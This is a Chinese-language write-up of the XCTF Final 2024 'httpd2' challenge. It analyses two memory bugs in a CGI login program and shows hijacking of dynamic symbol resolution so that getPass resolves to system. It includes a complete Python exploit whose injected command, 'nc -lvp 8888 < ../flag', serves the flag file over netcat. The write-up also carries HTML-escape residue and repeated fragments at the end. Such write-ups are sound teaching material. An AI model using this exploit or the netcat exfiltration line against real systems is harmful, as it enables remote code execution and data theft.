XCTF Final 2024 httpd2 Writeup 教学文档<\/h1>

题目概述<\/h2>
这是一个基于Apache服务器的CGI程序漏洞利用题目，主要考察对内存布局的理解和利用能力。题目实现了一个简单的登录逻辑CGI程序`main.cgi<\/code>，其中包含两个漏洞。<\/p>`

漏洞分析<\/h2>
漏洞1：全局数组越界写指针<\/h3>
在sub_1429<\/code>函数中，处理URL参数时会将参数指针保存到全局数组qword_40C0<\/code>中。虽然代码检查了索引是否超过0x2000<\/code>，但在循环中没有及时退出，导致可以越界写指针。<\/p>
if<\/span> (v11 !=<\/span> 0x2000<\/span>) {
<\/span><\/span>    qword_40C0[v11] =<\/span> v10 +<\/span> 1<\/span> +<\/span> v14;
<\/span><\/span>    if<\/span> (!<\/span>v9[1<\/span>]) break<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞2：genCookie函数中的越界写0<\/h3>
在genCookie<\/code>函数中，未检查输入的密码长度，导致可以越界写0：<\/p>
v4 =<\/span> strlen(a1);
<\/span><\/span>sub_135A(dest, 0x400uLL<\/span>, a1, v4 +<\/span> 1<\/span>);
<\/span><\/span>dest[v4] =<\/span> 0<\/span>;
<\/span><\/span>sprintf(src, ":%lx"<\/span>, buf);
<\/span><\/span>strncat(dest, src, 0x400uLL<\/span>);
<\/span><\/span>return<\/span> dest;
<\/span><\/span><\/code><\/pre>利用思路<\/h2>
1. 目标选择<\/h3>
利用第二个漏洞（越界写0）来修改link_map<\/code>结构中的l_info[DT_STRTAB]<\/code>，劫持_dl_runtime_resolve<\/code>流程，实现任意函数执行。<\/p>
2. _dl_runtime_resolve原理<\/h3>
_dl_runtime_resolve<\/code>在解析函数地址时：<\/p>

从link_map<\/code>中获取符号表(symtab<\/code>)和字符串表(strtab<\/code>)<\/li>
根据偏移从符号表获取对应表项<\/li>
使用strtab + sym->st_name<\/code>作为函数名查找函数地址<\/li>
<\/ol>
通过修改strtab<\/code>，可以控制解析的函数名。<\/p>
3. 利用步骤<\/h3>


定位关键地址<\/strong>：<\/p>

link_map<\/code>结构位于libctf.so<\/code>的内存区域<\/li>
l_info[DT_STRTAB]<\/code>位于link_map+0x68<\/code>处<\/li>
需要计算从缓冲区到目标地址的偏移<\/li>
<\/ul>
<\/li>

伪造strtab<\/strong>：<\/p>

复制原始strtab<\/code>内容<\/li>
将getPass<\/code>替换为system<\/code><\/li>
保持其他字符串偏移不变<\/li>
<\/ul>
<\/li>

内存布局<\/strong>：<\/p>

利用全局数组qword_40C0<\/code>存储伪造的strtab<\/code>指针<\/li>
通过越界写0修改l_info[DT_STRTAB]<\/code>指向伪造的指针<\/li>
<\/ul>
<\/li>

触发利用<\/strong>：<\/p>

调用getPass<\/code>函数时，实际会解析为system<\/code><\/li>
将命令作为用户名传入<\/li>
<\/ul>
<\/li>
<\/ol>
调试技巧<\/h2>


由于Apache会fork子进程处理请求，需要附加到正确的进程：<\/p>
gdb attach <www用户进程PID>
<\/span><\/span><\/code><\/pre><\/li>

设置断点和跟踪：<\/p>
break fork
set follow-fork-mode child
catch exec
continue
<\/code><\/pre>
<\/li>

程序会在main.cgi<\/code>的__start<\/code>处停下，可以开始调试<\/p>
<\/li>
<\/ol>
利用代码实现<\/h2>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>ip =<\/span> "127.0.0.1"<\/span>
<\/span><\/span>port =<\/span> 8888<\/span>
<\/span><\/span>
<\/span><\/span># 计算关键地址偏移<\/span>
<\/span><\/span>overflow_start_addr =<\/span> 0x7fbfd7002000<\/span> +<\/span> 0x14300<\/span>
<\/span><\/span>link_map_0x68 =<\/span> 0x7fbfd713c248<\/span>
<\/span><\/span>ptr_arr_addr =<\/span> 0x7fbfd7002000<\/span> +<\/span> 0x40C0<\/span>
<\/span><\/span>real_strtab_addr =<\/span> 0x7fbfd701aea0<\/span>
<\/span><\/span>
<\/span><\/span># 计算需要覆盖的偏移<\/span>
<\/span><\/span>strtab_pad =<\/span> link_map_0x68 -<\/span> overflow_start_addr +<\/span> 2<\/span>
<\/span><\/span>
<\/span><\/span># 伪造strtab，将getPass替换为system<\/span>
<\/span><\/span>fake_strtab =<\/span> "%00__gmon_start__%00_ITM_deregisterTMCloneTable%00_ITM_registerTMCloneTable%00__cxa_finalize<\/span>%00c<\/span>heckLogin<\/span>%00g<\/span>enCookie<\/span>%00g<\/span>etPass<\/span>%00s<\/span>trcmp%00printf<\/span>%00li<\/span>bctfc.so<\/span>%00li<\/span>bc.so.6<\/span>%00G<\/span>LIBC_2.2.5<\/span>%00%<\/span>00"<\/span>
<\/span><\/span>fake_strtab =<\/span> fake_strtab.<\/span>replace("<\/span>%00g<\/span>etPass%00"<\/span>, "<\/span>%00s<\/span>ystem%00"<\/span>.<\/span>ljust(len("<\/span>%00g<\/span>etPass%00"<\/span>), 'a'<\/span>))
<\/span><\/span>
<\/span><\/span>def<\/span> cons_ptr_arr<\/span>():
<\/span><\/span>    least_2_bytes =<\/span> real_strtab_addr &<\/span> 0xffff<\/span>
<\/span><\/span>    re =<\/span> ""<\/span>
<\/span><\/span>    offset =<\/span> ptr_arr_addr
<\/span><\/span>    for<\/span> i in<\/span> range(0x2000<\/span>):
<\/span><\/span>        if<\/span> (offset-<\/span>8<\/span>) &<\/span> 0xffff<\/span> ==<\/span> least_2_bytes:
<\/span><\/span>            re +=<\/span> fake_strtab
<\/span><\/span>            break<\/span>
<\/span><\/span>        else<\/span>:
<\/span><\/span>            re +=<\/span> "a=b"<\/span>
<\/span><\/span>            offset +=<\/span> 8<\/span>
<\/span><\/span>        re +=<\/span> '&'<\/span>
<\/span><\/span>    return<\/span> re
<\/span><\/span>
<\/span><\/span>def<\/span> send_req<\/span>(data):
<\/span><\/span>    url =<\/span> f<\/span>"http:\/\/<\/span>{<\/span>ip}<\/span>:<\/span>{<\/span>port}<\/span>\/cgi-bin\/main.cgi"<\/span>
<\/span><\/span>    data_len =<\/span> len(data)
<\/span><\/span>    headers =<\/span> {
<\/span><\/span>        "Content-Type"<\/span>: "application\/x-www-form-urlencoded; charset=UTF-8"<\/span>,
<\/span><\/span>        "Content-Length"<\/span>: f<\/span>"<\/span>{<\/span>data_len}<\/span>"<\/span>,
<\/span><\/span>    }
<\/span><\/span>    response =<\/span> requests.<\/span>post(url, data=<\/span>data)
<\/span><\/span>    print(response.<\/span>text)
<\/span><\/span>
<\/span><\/span># 构造利用数据<\/span>
<\/span><\/span>data =<\/span> cons_ptr_arr()
<\/span><\/span>cmd =<\/span> "nc -lvp 8888 < ..\/flag"<\/span>
<\/span><\/span>data +=<\/span> f<\/span>"&username=<\/span>{<\/span>cmd}<\/span>&passwd=<\/span>{<\/span>'a'<\/span>*<\/span>strtab_pad}<\/span>&a=b"<\/span>
<\/span><\/span>
<\/span><\/span># 尝试利用<\/span>
<\/span><\/span>i =<\/span> 0<\/span>
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    i +=<\/span> 1<\/span>
<\/span><\/span>    print(i)
<\/span><\/span>    send_req(data)
<\/span><\/span><\/code><\/pre>关键点总结<\/h2>

漏洞选择<\/strong>：虽然有两个漏洞，但只有越界写0的漏洞实际可利用<\/li>
利用目标<\/strong>：选择修改link_map<\/code>结构中的strtab<\/code>指针<\/li>
内存布局<\/strong>：

精确计算偏移量<\/li>
利用全局数组存储伪造指针<\/li>
<\/ul>
<\/li>
函数劫持<\/strong>：将getPass<\/code>替换为system<\/code><\/li>
稳定性<\/strong>：由于ASLR存在，可能需要多次尝试<\/li>
<\/ol>
防御建议<\/h2>

对所有数组访问进行边界检查<\/li>
对用户输入的长度进行严格限制<\/li>
使用更安全的字符串处理函数<\/li>
启用更严格的内存保护机制（如FORTIFY_SOURCE）<\/li>
<\/ol>
这个题目展示了如何利用看似微小的内存破坏漏洞（单个字节的越界写）来实现完整的代码执行，强调了内存安全编程的重要性。<\/p>

XCTF Final 2024 httpd2 Writeup 教学文档<\/h1>

题目概述<\/h2> 这是一个基于Apache服务器的CGI程序漏洞利用题目，主要考察对内存布局的理解和利用能力。题目实现了一个简单的登录逻辑CGI程序main.cgi<\/code>，其中包含两个漏洞。<\/p>

利用思路<\/h2>

1. 目标选择<\/h3> 利用第二个漏洞（越界写0）来修改link_map<\/code>结构中的l_info[DT_STRTAB]<\/code>，劫持_dl_runtime_resolve<\/code>流程，实现任意函数执行。<\/p>

题目概述<\/h2>
这是一个基于Apache服务器的CGI程序漏洞利用题目，主要考察对内存布局的理解和利用能力。题目实现了一个简单的登录逻辑CGI程序`main.cgi<\/code>，其中包含两个漏洞。<\/p>`

1. 目标选择<\/h3>
利用第二个漏洞（越界写0）来修改`link_map<\/code>结构中的l_info[DT_STRTAB]<\/code>，劫持_dl_runtime_resolve<\/code>流程，实现任意函数执行。<\/p>`